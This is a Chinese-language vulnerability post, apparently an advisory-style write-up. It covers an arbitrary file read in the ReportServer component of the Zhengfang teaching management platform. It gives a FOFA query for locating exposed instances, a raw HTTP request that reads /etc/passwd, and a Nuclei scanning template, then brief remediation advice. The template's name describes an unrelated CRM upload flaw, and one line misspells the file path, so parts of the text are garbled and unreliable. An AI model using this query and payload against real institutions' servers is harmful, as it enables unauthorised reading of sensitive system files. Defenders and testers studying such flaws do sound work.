免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
正方教学管理信息服务平台以培养、运行、保障、监控为主线,实现教务工作事务性管理和战略性管理的相互叠加,满足学校培养过程管理、教学质量检查、教学工作评价、教学业绩评价、教学改革发展等战略性需求。
正方教学管理信息服务平台ReportServer存在任意文件读取漏洞,攻击者可通过该漏洞获取服务器上敏感文件内容
Ⅱ、fofa语句
body="正方软件股份有限公司" && title="教学管理信息服务平台"
Ⅲ、漏洞复现
POC
GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
1、发送数据包。读取/tec/passwd文件内容
Ⅳ、Nuclei-POC
id: ZF-ReportServer-uploadread
info:
name: 浙大恩特客户资源管理系统中/entsoft/CrmBasicAction.entcrm接口处存在任意文件上传漏洞
author: WLF
severity: high
metadata:
fofa-query: body="正方软件股份有限公司" && title="教学管理信息服务平台"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"bin/bash","root")
Ⅴ、修复建议
1、请联系厂商进行修复或升级到安全版本。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。